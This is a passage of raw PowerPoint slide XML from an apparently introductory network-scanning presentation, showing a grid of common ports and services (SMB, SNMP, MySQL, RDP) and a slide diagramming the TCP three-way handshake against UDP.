              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>139</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126480" y="6236208"/>
            <a:ext cx="1024128" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242048" y="5943600"/>
            <a:ext cx="1024128" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242048" y="5998464"/>
            <a:ext cx="1024128" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>161</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242048" y="6236208"/>
            <a:ext cx="1024128" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SNMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357616" y="5943600"/>
            <a:ext cx="1024128" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357616" y="5998464"/>
            <a:ext cx="1024128" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>445</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357616" y="6236208"/>
            <a:ext cx="1024128" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9473184" y="5943600"/>
            <a:ext cx="1024128" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9473184" y="5998464"/>
            <a:ext cx="1024128" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3306</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9473184" y="6236208"/>
            <a:ext cx="1024128" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10588752" y="5943600"/>
            <a:ext cx="1024128" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10588752" y="5998464"/>
            <a:ext cx="1024128" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3389</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10588752" y="6236208"/>
            <a:ext cx="1024128" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>RDP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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01 / FOUNDATIONS</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TCP, UDP and the handshake that scanning is built on</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09</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1463040"/>
            <a:ext cx="6035040" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1728"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="1645920"/>
            <a:ext cx="5486400" cy="320040"/>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TCP: connect first, talk later</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2103120"/>
            <a:ext cx="1097280" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>CLIENT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="2103120"/>
            <a:ext cx="1097280" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SERVER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417320" y="2450592"/>
            <a:ext cx="0" cy="2468880"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5623560" y="2450592"/>
            <a:ext cx="0" cy="2468880"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417320" y="2697480"/>
            <a:ext cx="4206240" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1965960" y="2368296"/>
            <a:ext cx="3108960" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417320" y="3429000"/>
            <a:ext cx="4206240" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="B174FB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1965960" y="3099816"/>
            <a:ext cx="3108960" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN / ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417320" y="4160520"/>
            <a:ext cx="4206240" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1965960" y="3831336"/>
            <a:ext cx="3108960" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417320" y="4526280"/>
            <a:ext cx="4206240" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>connection established, data flows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="1463040"/>
            <a:ext cx="4782312" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1728"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114032" y="1645920"/>
            <a:ext cx="4297680" cy="320040"/>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UDP: shout and hope</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114032" y="2148840"/>
            <a:ext cx="4297680" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>No handshake, no connection, no guaranteed delivery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
